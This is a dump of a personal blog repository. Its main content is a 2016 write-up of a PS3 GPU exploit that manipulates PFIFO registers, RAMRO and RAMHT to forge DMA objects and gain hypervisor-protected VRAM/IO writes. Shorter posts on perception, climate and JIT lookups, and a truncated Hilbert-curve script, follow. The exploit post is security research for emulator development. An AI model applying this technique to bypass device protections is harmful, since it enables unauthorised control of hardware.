 98 | ### RAMRO as RAMHT entry generator
 99 | 
100 | However, there is still a way to get such entries in RAMHT. RAMRO can only be relocated in the range *0x0* to *0x1FE00* and have an alignment of 512 byte. The submission of invalid PFIFO commands causes 8 byte writes in RAMRO in which the first word holds the error report and the second word the submitted argument. We can control the argument and predict the error report, thus being able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT we should ensure that no existing entry is overwritten:
101 | 
102 | 1. Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }.
103 | 2. Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }.
104 | 3. Their corresponding RAMHT offset for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }.
105 | 
106 | After computing the RAMHT offsets for all pairs consisting of any handles ever created by the LV1 driver and any possible channels ID (up to the maximum of 4 that LV1 supports), we know that no handle will ever be placed by the driver in the RAMHT range `0xC00` - `0xCFF` (note that `0xC00` is 512 byte aligned). Threfore RAMRO could be moved inside RAMHT without fearing a collision.
107 | 
108 | ### Accessing custom DMA objects
109 | 
110 | The reserved VRAM for `vsh.self` (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.:
111 | 
112 | ```cpp
113 | 0x00808000 == (1 /*Channel ID*/ << 23) | (0x800000 /*RAMIN offset at 8 MB*/ >> 4)
114 | ```
115 | 
116 | The only remaining step is placing our custom DMA object in that offset. Finally a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range:
117 | 
118 | * `0x0060` *NV406E_SET_CONTEXT_DMA_SEMAPHORE*: Set DMA object handle (i.e. the `0x504010XX` reports above) 
119 | * `0x0064` *NV406E_SEMAPHORE_OFFSET*: Set the offset we want to write in.
120 | * `0x006C` *NV406E_SEMAPHORE_RELEASE*: Write the specified value there.
121 | 
122 | If the specified value ends up at said offset in the range specified by our DMA object the exploit succeeded.
123 | 


--------------------------------------------------------------------------------
/posts/2016-03-16-ps3-gpu-exploit/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>PS3 GPU Full VRAM/IO access exploit</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>PS3 GPU Full VRAM/IO access exploit</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2016-03-16</span>
 72 |             </p>
 73 |             <h2 id="introduction">Introduction</h2>
 74 | <p>During the early development of the PlayStation 3 emulator project <a href="https://github.com/AlexAltea/nucleus">Nucleus</a>, it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to <em>LV2</em>. This implied reverse engineering and reimplementing the kernel, and intercept the syscalls used by the user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix <code>sys_rsx</code>, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper of the actual hypervisor-level RSX driver, accessible through the <code>lv1_gpu</code> syscalls.</p>
 75 | <p>Between February 2016 and March 2016, the developer <em>@3141card</em> reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the <a href="https://github.com/envytools/envytools">Envytools</a>/<a href="https://nouveau.freedesktop.org">Nouveau</a> projects and advice from <em>@mwk</em> eased the security analysis, resulting in the vulnerability presented here.</p>
 76 | <h2 id="reality-synthesizer">Reality Synthesizer</h2>
 77 | <p>The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. RSX exposes 3 Base Address Registers (BARs):</p>
 78 | <table>
 79 | <thead>
 80 | <tr>
 81 | <th>BAR</th>
 82 | <th>Offset</th>
 83 | <th>Size</th>
 84 | <th>Description</th>
 85 | </tr>
 86 | </thead>
 87 | <tbody>
 88 | <tr>
 89 | <td><em>BAR0</em></td>
 90 | <td><code>0x28000000000</code></td>
 91 | <td>32 MB</td>
 92 | <td>MMIO</td>
 93 | </tr>
 94 | <tr>
 95 | <td><em>BAR1</em></td>
 96 | <td><code>0x28080000000</code></td>
 97 | <td>256 MB</td>
 98 | <td>VRAM</td>
 99 | </tr>
100 | <tr>
101 | <td><em>BAR2</em></td>
102 | <td><code>0x28002000000</code></td>
103 | <td><em>???</em></td>
104 | <td>RAMIN</td>
105 | </tr>
106 | </tbody>
107 | </table>
108 | <p>While <em>BAR0</em> points to the MMIO register area, both <em>BAR1</em> and <em>BAR2</em> map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. Following formulas can be used to convert a BAR1 offset into a BAR2 offset and vice-versa:</p>
109 | <div class="codehilite"><pre><span></span><span class="kt">uint32_t</span> <span class="nf">addr_vram_to_pramin</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">offset</span><span class="p">)</span> <span class="p">{</span>
110 |     <span class="kt">uint32_t</span> <span class="n">vram_size</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span> <span class="c1">// 256 MB</span>
111 |     <span class="kt">uint32_t</span> <span class="n">rev_size</span> <span class="o">=</span> <span class="mh">0x80000</span><span class="p">;</span> <span class="c1">// 512 KB</span>
112 |     <span class="k">return</span> <span class="p">(</span><span class="n">offset</span> <span class="o">-</span> <span class="n">vram_size</span><span class="p">)</span> <span class="o">^</span> <span class="o">-</span><span class="n">rev_size</span><span class="p">;</span>
113 | <span class="p">}</span>
114 | 
115 | <span class="kt">uint32_t</span> <span class="nf">addr_ramin_to_vram</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">offset</span><span class="p">)</span> <span class="p">{</span>
116 |     <span class="kt">uint32_t</span> <span class="n">vram_size</span> <span class="o">=</span> <span class="mh">0x10000000</span><span class="p">;</span> <span class="c1">// 256 MB</span>
117 |     <span class="kt">uint32_t</span> <span class="n">rev_size</span> <span class="o">=</span> <span class="mh">0x80000</span><span class="p">;</span> <span class="c1">// 512 KB</span>
118 |     <span class="k">return</span> <span class="n">vram_size</span> <span class="o">-</span> <span class="p">(</span><span class="n">offset</span> <span class="o">-</span> <span class="p">(</span><span class="n">offset</span> <span class="o">%</span> <span class="n">rev_size</span><span class="p">))</span> <span class="o">-</span> <span class="n">rev_size</span> <span class="o">+</span> <span class="p">(</span><span class="n">offset</span> <span class="o">%</span> <span class="n">rev_size</span><span class="p">);</span>
119 | <span class="p">}</span>
120 | </pre></div>
121 | 
122 | 
123 | <p>The driver fills RAMIN with objects which can be either <em>Engine objects</em> or <em>DMA objects</em>, commonly known as <em>FIFO objects</em>. The first kind describe engines that do a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.) the latter describe a DMA-accessible location.</p>
124 | <p>Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates hash-table known as <em>RAMHT</em>  which maps a unique handler to the RAMIN offset where the target DMA object is located.</p>
125 | <p>The DMA objects contain information about the access type, the range size and starting offset. Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets:</p>
126 | <table>
127 | <thead>
128 | <tr>
129 | <th>Offset</th>
130 | <th>Description</th>
131 | </tr>
132 | </thead>
133 | <tbody>
134 | <tr>
135 | <td><code>0x00000000</code> - <code>0x0FFFFFFF</code></td>
136 | <td>VRAM</td>
137 | </tr>
138 | <tr>
139 | <td><code>0x80000000</code> - <code>0x8FFFFFFF</code></td>
140 | <td>IOMMU (Context 0)</td>
141 | </tr>
142 | <tr>
143 | <td><code>0x90000000</code> - <code>0x9FFFFFFF</code></td>
144 | <td>IOMMU (Context 1)</td>
145 | </tr>
146 | </tbody>
147 | </table>
148 | <h2 id="exploit">Exploit</h2>
149 | <h3 id="rsx-mmio-register-mapping">RSX MMIO register mapping</h3>
150 | <p>The LV2 kernel provides the following syscall:</p>
151 | <div class="codehilite"><pre><span></span><span class="c1">// LV2 SysCall 675 (0x2A3)</span>
152 | <span class="kt">uint64_t</span> <span class="nf">sys_rsx_device_map</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="n">mmio_addr</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">vram_addr</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">device_id</span><span class="p">);</span>
153 | </pre></div>
154 | 
155 | 
156 | <p>The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability:</p>
157 | <table>
158 | <thead>
159 | <tr>
160 | <th>Device</th>
161 | <th>MMIO</th>
162 | <th>VRAM</th>
163 | <th>Description</th>
164 | <th>Control</th>
165 | </tr>
166 | </thead>
167 | <tbody>
168 | <tr>
169 | <td>5</td>
170 | <td><code>0x08A000</code></td>
171 | <td><code>----------</code></td>
172 | <td></td>
173 | <td>No</td>
174 | </tr>
175 | <tr>
176 | <td>6</td>
177 | <td><code>0x200000</code></td>
178 | <td><code>----------</code></td>
179 | <td>PMEDIA</td>
180 | <td>No</td>
181 | </tr>
182 | <tr>
183 | <td>7</td>
184 | <td><code>0x600000</code></td>
185 | <td><code>----------</code></td>
186 | <td>PCRTC</td>
187 | <td>No</td>
188 | </tr>
189 | <tr>
190 | <td>8</td>
191 | <td><code>--------</code></td>
192 | <td><code>0x0FF10000</code></td>
193 | <td></td>
194 | <td>No</td>
195 | </tr>
196 | <tr>
197 | <td>9</td>
198 | <td><code>0x400000</code></td>
199 | <td><code>----------</code></td>
200 | <td>PGRAPH</td>
201 | <td>Yes</td>
202 | </tr>
203 | <tr>
204 | <td>10</td>
205 | <td><code>0x100000</code></td>
206 | <td><code>----------</code></td>
207 | <td>PFB</td>
208 | <td>Yes</td>
209 | </tr>
210 | <tr>
211 | <td>11</td>
212 | <td><code>0x00A000</code></td>
213 | <td><code>----------</code></td>
214 | <td>PCOUNTER</td>
215 | <td>Yes</td>
216 | </tr>
217 | <tr>
218 | <td>12</td>
219 | <td><code>0x680000</code></td>
220 | <td><code>----------</code></td>
221 | <td></td>
222 | <td>Yes</td>
223 | </tr>
224 | <tr>
225 | <td>13</td>
226 | <td><code>0x090000</code></td>
227 | <td><code>----------</code></td>
228 | <td></td>
229 | <td>Yes</td>
230 | </tr>
231 | <tr>
232 | <td><strong>14</strong></td>
233 | <td><strong><code>0x002000</code></strong></td>
234 | <td><strong><code>----------</code></strong></td>
235 | <td><strong>PFIFO</strong></td>
236 | <td><strong>Yes</strong></td>
237 | </tr>
238 | <tr>
239 | <td>15</td>
240 | <td><code>0x088000</code></td>
241 | <td><code>----------</code></td>
242 | <td>IOIF</td>
243 | <td>Yes</td>
244 | </tr>
245 | </tbody>
246 | </table>
247 | <p>By mapping the device 14, we can access the PFIFO MMIO registers from the userland code (or LV2 if <code>ss.param.fself.control</code> prevents from doing that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some of them struck as particularly dangerous if misused. These registers are described below:</p>
248 | <ul>
249 | <li><code>0x002140</code> <em>NV03_PFIFO_INTR_EN_0</em>: Disable the interrupts that trigger LV1 panics.</li>
250 | <li><code>0x002210</code> <em>NV03_PFIFO_RAMHT</em>: Controls the size and RAMIN offset of RAMHT.</li>
251 | <li><code>0x002218</code> <em>NV03_PFIFO_RAMRO</em>: Controls the size and RAMIN offset of RAMRO.</li>
252 | <li><code>0x002504</code> <em>NV04_PFIFO_MODE</em>: Alternate between PIO and DMA mode in channels.</li>
253 | </ul>
254 | <p>These register fields are described in detail here in <a href="https://github.com/envytools/envytools/blob/master/rnndb/fifo/nv1_pfifo.xml">nv1_pfifo.xml</a>. CellOS-LV1 sets RAMHT at RAMIN offset <code>0x10000</code> and a 16 KB uin size and RAMRO at RAMIN offset <code>0x18000</code> with 512 bytes in size.</p>
255 | <h3 id="ramht-manipulation-attempt">RAMHT manipulation attempt</h3>
256 | <p>Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT to reinterpret other byte sequences as valid entries. By the information before, RAMHT can only be relocated in the range <em>0x0</em> to <em>0x1F000</em> and have an alignment of 4 KB. In order to get a valid RAMHT entry poiting to our VRAM area, we need to find 8 byte sequence satisfying:</p>
257 | <ol>
258 | <li>Reinterpreting the bits 31:23 (MSB:LSB) of the second word is equal to 1 (i.e. our application's PFIFO channel).  </li>
259 | <li>Reinterpreting the bits 19:0 (MSB:LSB) of the second word is a value in range <code>[0x20000-0xFFFFF]</code> (mappable VRAM).</li>
260 | <li>Calculating the RAMHT offset minus the entry offset results in a multiple of 4 KB.</li>
261 | </ol>
262 | <p>These conditions are hard to satisfy and aside from unlikely random values that might have been written during memtest, they will not be found in this range.</p>
263 | <h3 id="ramro-as-ramht-entry-generator">RAMRO as RAMHT entry generator</h3>
264 | <p>However, there is still a way to get such entries in RAMHT. RAMRO can only be relocated in the range <em>0x0</em> to <em>0x1FE00</em> and have an alignment of 512 byte. The submission of invalid PFIFO commands causes 8 byte writes in RAMRO in which the first word holds the error report and the second word the submitted argument. We can control the argument and predict the error report, thus being able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT we should ensure that no existing entry is overwritten:</p>
265 | <ol>
266 | <li>Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }.</li>
267 | <li>Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }.</li>
268 | <li>Their corresponding RAMHT offset for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }.</li>
269 | </ol>
270 | <p>After computing the RAMHT offsets for all pairs consisting of any handles ever created by the LV1 driver and any possible channels ID (up to the maximum of 4 that LV1 supports), we know that no handle will ever be placed by the driver in the RAMHT range <code>0xC00</code> - <code>0xCFF</code> (note that <code>0xC00</code> is 512 byte aligned). Threfore RAMRO could be moved inside RAMHT without fearing a collision.</p>
271 | <h3 id="accessing-custom-dma-objects">Accessing custom DMA objects</h3>
272 | <p>The reserved VRAM for <code>vsh.self</code> (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.:</p>
273 | <div class="codehilite"><pre><span></span><span class="mh">0x00808000</span> <span class="o">==</span> <span class="p">(</span><span class="mi">1</span> <span class="cm">/*Channel ID*/</span> <span class="o">&lt;&lt;</span> <span class="mi">23</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="mh">0x800000</span> <span class="cm">/*RAMIN offset at 8 MB*/</span> <span class="o">&gt;&gt;</span> <span class="mi">4</span><span class="p">)</span>
274 | </pre></div>
275 | 
276 | 
277 | <p>The only remaining step is placing our custom DMA object in that offset. Finally a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range:</p>
278 | <ul>
279 | <li><code>0x0060</code> <em>NV406E_SET_CONTEXT_DMA_SEMAPHORE</em>: Set DMA object handle (i.e. the <code>0x504010XX</code> reports above) </li>
280 | <li><code>0x0064</code> <em>NV406E_SEMAPHORE_OFFSET</em>: Set the offset we want to write in.</li>
281 | <li><code>0x006C</code> <em>NV406E_SEMAPHORE_RELEASE</em>: Write the specified value there.</li>
282 | </ul>
283 | <p>If the specified value ends up at said offset in the range specified by our DMA object the exploit succeeded.</p>
284 |         </article>
285 |         <hr>
286 |         <footer>
287 |             <p>
288 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
289 |             </p>
290 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
291 |         </footer>
292 |     </body>
293 | </html>
294 | 


--------------------------------------------------------------------------------
/posts/2016-08-22-observations/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: live
 3 | date: 2016-08-22
 4 | title: Observations
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me.
 9 | 
10 | ## Light
11 | 
12 | * When observing a blacklight or UV-A light, i.e. one of these blue/purple-ish lamps that make white and fluorescent objects specially bright, my eyes disagree on the perceived light. From my point of view: My left eye shows it blurry, as if it couldn't focus on the light source and with a slightly darker-blue hue. My right eye can focuses correctly on the light source, but perceives it with a slightly brighter-purple color.
13 | 
14 | * Doing fast eye movements while keeping a LED-based white light in my field of view, makes the light be perceived as separate red-green-blue components at different positions. Why does this happen?
15 | 
16 | * When firing small handheld lasers, one can perceive a fine-grained pattern of dots where the beam hits. Any small translation or rotation of the laser diode seem to completely change this pattern. Since involuntary movements are hard to avoid the resulting effect looks like video noise. Why does this happen?
17 | 
18 | 
19 | ## Climate
20 | 
21 | * Suggested by the *clathrate gun hypothesis* [1], the rise in global temperatures will cause, or is causing, vast amounts of methane gas to be released to the athmosphere. The impact of methane gas is more than 25 times higher than carbon dioxide [2], thus resulting in devastating consequences for the whole planet. The burning methane corresponds to the reaction: CH4 + 2 O2 -> CO2 + 2 H2O. Question: Assuming the chain reaction has already started and is inevitable, why don't we burn the methane deposits under the siberian permafrost?
22 |     1. https://en.wikipedia.org/wiki/Clathrate_gun_hypothesis
23 |     2. https://www3.epa.gov/climatechange/ghgemissions/gases/ch4.html
24 | 


--------------------------------------------------------------------------------
/posts/2016-08-22-observations/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>Observations</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>Observations</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2016-08-22</span>
 72 |             </p>
 73 |             <p>Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me.</p>
 74 | <h2 id="light">Light</h2>
 75 | <ul>
 76 | <li>
 77 | <p>When observing a blacklight or UV-A light, i.e. one of these blue/purple-ish lamps that make white and fluorescent objects specially bright, my eyes disagree on the perceived light. From my point of view: My left eye shows it blurry, as if it couldn't focus on the light source and with a slightly darker-blue hue. My right eye can focuses correctly on the light source, but perceives it with a slightly brighter-purple color.</p>
 78 | </li>
 79 | <li>
 80 | <p>Doing fast eye movements while keeping a LED-based white light in my field of view, makes the light be perceived as separate red-green-blue components at different positions. Why does this happen?</p>
 81 | </li>
 82 | <li>
 83 | <p>When firing small handheld lasers, one can perceive a fine-grained pattern of dots where the beam hits. Any small translation or rotation of the laser diode seem to completely change this pattern. Since involuntary movements are hard to avoid the resulting effect looks like video noise. Why does this happen?</p>
 84 | </li>
 85 | </ul>
 86 | <h2 id="climate">Climate</h2>
 87 | <ul>
 88 | <li>Suggested by the <em>clathrate gun hypothesis</em> [1], the rise in global temperatures will cause, or is causing, vast amounts of methane gas to be released to the athmosphere. The impact of methane gas is more than 25 times higher than carbon dioxide [2], thus resulting in devastating consequences for the whole planet. The burning methane corresponds to the reaction: CH4 + 2 O2 -&gt; CO2 + 2 H2O. Question: Assuming the chain reaction has already started and is inevitable, why don't we burn the methane deposits under the siberian permafrost?<ol>
 89 | <li>https://en.wikipedia.org/wiki/Clathrate_gun_hypothesis</li>
 90 | <li>https://www3.epa.gov/climatechange/ghgemissions/gases/ch4.html</li>
 91 | </ol>
 92 | </li>
 93 | </ul>
 94 |         </article>
 95 |         <hr>
 96 |         <footer>
 97 |             <p>
 98 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
 99 |             </p>
100 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
101 |         </footer>
102 |     </body>
103 | </html>
104 | 


--------------------------------------------------------------------------------
/posts/2016-09-14-jit-compiled-maps/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: post
 3 | date: 2016-09-07
 4 | title: Fast lookups in JIT-compiled maps
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data.
 9 | 
10 | ## Background
11 | 
12 | Some time ago, I reimplemented the [RSX GPU](https://en.wikipedia.org/wiki/RSX_%27Reality_Synthesizer%27) command processor in the emulator, [Nucleus](https://github.com/AlexAltea/nucleus). This GPU is made of several engines, each bound at a specific index (*0*-*7*) of the command processor, and each index provides a MMIO register window (*0x0*-*0x1FFC*). Commands are 16-bit bitfields containing an index (3-bit) and MMIO offset (13-bit). Recent userland drivers always bound engines to the same indices and there was a limited number valid MMIO offsets, our command processor was just a big hardcoded *switch-case* mapping commands to corresponding emulator function.
13 | 
14 | However, older or custom drivers might bind engines at different indices making our compile-time *switch-case* useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands could have made this impossible. Since lookup times are critical, this yields the question, **what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime?** Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time?
15 | 
16 | Jitter solves this by letting the compiler decide that.
17 | 
18 | ---
19 | 
20 | __TODO: More information soon.__
21 | 


--------------------------------------------------------------------------------
/posts/2016-09-14-jit-compiled-maps/index.html:
--------------------------------------------------------------------------------
 1 | <!-- This file has been auto-generated! -->
 2 | <!DOCTYPE html>
 3 | <html>
 4 |     <head>
 5 |         <meta charset="utf-8">
 6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
 7 |         <title>Fast lookups in JIT-compiled maps</title>
 8 |         <!-- Style -->
 9 |         <link rel="stylesheet" href="../../css/code.css">
10 |         <link rel="stylesheet" href="../../css/markdown.css">
11 |         <style>
12 |             body {
13 |                 box-sizing: border-box;
14 |                 min-width: 200px;
15 |                 max-width: 980px;
16 |                 margin: 0 auto;
17 |                 padding: 45px;
18 |             }
19 | 
20 |             header {
21 |                 position: relative;
22 |             }
23 |             header > .links {
24 |                 position: absolute;
25 |                 right: 0;
26 |             }
27 | 
28 |             .post-key {
29 |                 background-color: hsl(45, 67%, 80%);
30 |                 border-radius: 5px 0px 0px 5px;
31 |                 padding: 2px 6px 2px 8px;
32 |                 margin: 0px;
33 |             }
34 |             .post-val {
35 |                 background-color: hsl(45, 67%, 90%);
36 |                 border-radius: 0px 5px 5px 0px;
37 |                 padding: 2px 8px 2px 6px;
38 |                 margin: 0px;
39 |             }
40 | 
41 |             footer {
42 |                 text-align: center;
43 |             }
44 |         
45 |             @media (max-width: 767px) {
46 |                 body {
47 |                     padding: 15px;
48 |                 }
49 |             }
50 |         </style>
51 |     </head>
52 |     <body class="markdown-body">
53 |         <header>
54 |             <div class="links">
55 |                 <span>
56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
57 |                     <a href="https://github.com/AlexAltea">Github</a> |
58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
59 |                 </span>
60 |             </div>
61 |             <span><a href="../../">&lt; Other articles</a></span>
62 |         </header>
63 |         <article>
64 |             <h1>Fast lookups in JIT-compiled maps</h1>
65 |             <p>
66 |                 <span 
67 |                     class="post-key">Author</span><span
68 |                     class="post-val">Alexandro Sanchez</span>
69 |                 <span
70 |                     class="post-key">Date</span><span
71 |                     class="post-val">2016-09-07</span>
72 |             </p>
73 |             <p>This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data.</p>
74 | <h2 id="background">Background</h2>
75 | <p>Some time ago, I reimplemented the <a href="https://en.wikipedia.org/wiki/RSX_%27Reality_Synthesizer%27">RSX GPU</a> command processor in the emulator, <a href="https://github.com/AlexAltea/nucleus">Nucleus</a>. This GPU is made of several engines, each bound at a specific index (<em>0</em>-<em>7</em>) of the command processor, and each index provides a MMIO register window (<em>0x0</em>-<em>0x1FFC</em>). Commands are 16-bit bitfields containing an index (3-bit) and MMIO offset (13-bit). Recent userland drivers always bound engines to the same indices and there was a limited number valid MMIO offsets, our command processor was just a big hardcoded <em>switch-case</em> mapping commands to corresponding emulator function.</p>
76 | <p>However, older or custom drivers might bind engines at different indices making our compile-time <em>switch-case</em> useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands could have made this impossible. Since lookup times are critical, this yields the question, <strong>what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime?</strong> Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time?</p>
77 | <p>Jitter solves this by letting the compiler decide that.</p>
78 | <hr>
79 | <p><strong>TODO: More information soon.</strong></p>
80 |         </article>
81 |         <hr>
82 |         <footer>
83 |             <p>
84 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
85 |             </p>
86 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
87 |         </footer>
88 |     </body>
89 | </html>
90 | 


--------------------------------------------------------------------------------
/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.png


--------------------------------------------------------------------------------
/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function
 2 | from PIL import Image, ImageDraw, ImageColor
 3 | 
 4 | sz = 256   # Image size
 5 | mg = 32    # Image magnification (line segment size)
 6 | width = 3  # Line width
 7 | 
 8 | # Utility function for mapping list of colors names
 9 | def get_colors(colors, mode='RGB'):
10 |     if colors is None:
11 |         colors = 'black'
12 |     return list(map(lambda x: ImageColor.getcolor(x, mode), colors.split(',')))
13 | 
14 | def popcount(x):
15 |     n = 0
16 |     while x:
17 |         n += 1
18 |         x &= (x - 1)  # Clear the bottom-most set bit - cf snippet 0x2f
19 |     return n
20 | 
21 | def hilbert_direction(idx):
22 |     aa = 0xaa
23 |     aa |= aa << 8
24 |     aa |= aa << 16
25 |     aa |= aa << 32
26 |     r = popcount(idx & (idx & aa) >> 1) & 1
27 |     s = popcount(-idx & (-idx & aa) >> 1) & 1
28 |     return 1 - r - s, r - s
29 | 
30 | def draw_hilbert(n, mg, width=1, colors=None, mode='RGB'):
31 |     # how much to shift lines by
